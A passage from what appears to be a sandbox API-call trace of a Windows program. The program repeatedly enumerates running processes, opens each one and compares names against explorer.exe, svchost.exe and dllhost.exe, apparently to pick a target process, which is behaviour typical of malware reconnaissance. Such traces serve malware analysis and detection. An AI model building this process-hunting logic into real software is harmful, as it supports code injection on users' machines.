(in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0221.915] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0221.916] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0221.916] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0221.917] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0221.917] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0221.918] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0221.918] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0221.919] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0221.919] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.920] CloseHandle (hObject=0xd8) returned 1 [0221.920] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0221.920] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0221.920] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0221.920] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0221.920] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0221.921] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.921] CloseHandle (hObject=0xd8) returned 1 [0221.921] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0221.921] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0221.921] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0221.921] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0221.921] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0221.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0221.922] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0221.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0221.922] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.922] CloseHandle (hObject=0xd8) returned 1 [0221.923] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0221.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0221.923] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.923] CloseHandle (hObject=0xd8) returned 1 [0221.923] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0221.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0221.924] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.924] CloseHandle (hObject=0xd8) returned 1 [0221.924] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0221.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0221.924] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.924] CloseHandle (hObject=0xd8) returned 1 [0221.924] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0221.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0221.925] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.925] CloseHandle (hObject=0xd8) returned 1 [0221.925] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0221.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0221.925] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.925] CloseHandle (hObject=0xd8) returned 1 [0221.925] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0221.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0221.926] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.926] CloseHandle (hObject=0xd8) returned 1 [0221.926] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0221.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0221.927] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.927] CloseHandle (hObject=0xd8) returned 1 [0221.927] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0221.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0221.927] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.927] CloseHandle (hObject=0xd8) returned 1 [0221.927] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0221.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0221.928] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.928] CloseHandle (hObject=0xd8) returned 1 [0221.928] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0221.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0221.928] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.928] CloseHandle (hObject=0xd8) returned 1 [0221.928] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0221.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0221.929] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.929] CloseHandle (hObject=0xd8) returned 1 [0221.929] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0221.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0221.930] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.930] CloseHandle (hObject=0xd8) returned 1 [0221.930] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0221.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0221.930] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.930] CloseHandle (hObject=0xd8) returned 1 [0221.930] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0221.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0221.931] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.931] CloseHandle (hObject=0xd8) returned 1 [0221.931] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0221.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0221.931] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.931] CloseHandle (hObject=0xd8) returned 1 [0221.931] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0221.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0221.932] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.932] CloseHandle (hObject=0xd8) returned 1 [0221.932] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0221.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0221.933] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.933] CloseHandle (hObject=0xd8) returned 1 [0221.933] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0221.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0221.933] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.933] CloseHandle (hObject=0xd8) returned 1 [0221.933] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0221.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0221.934] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.934] CloseHandle (hObject=0xd8) returned 1 [0221.934] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0221.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0221.934] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.934] CloseHandle (hObject=0xd8) returned 1 [0221.934] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0221.935] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0221.935] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0221.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0221.936] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0221.937] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0221.937] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0221.938] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.938] CloseHandle (hObject=0xd8) returned 1 [0221.938] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0221.938] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0221.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0221.938] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.938] CloseHandle (hObject=0xd8) returned 1 [0221.938] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0221.938] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0221.938] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0221.938] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0221.939] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0221.939] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.939] CloseHandle (hObject=0xd8) returned 1 [0221.939] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0221.940] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.940] CloseHandle (hObject=0xd8) returned 1 [0221.940] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0221.940] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0221.941] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.941] CloseHandle (hObject=0xd8) returned 1 [0221.941] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.941] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0221.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0221.942] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0221.942] CloseHandle (hObject=0xd8) returned 1 [0221.942] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0221.942] CloseHandle (hObject=0xd4) returned 1 [0221.942] Sleep (dwMilliseconds=0x3e8) [0222.998] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0223.000] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0223.001] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0223.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0223.001] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0223.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 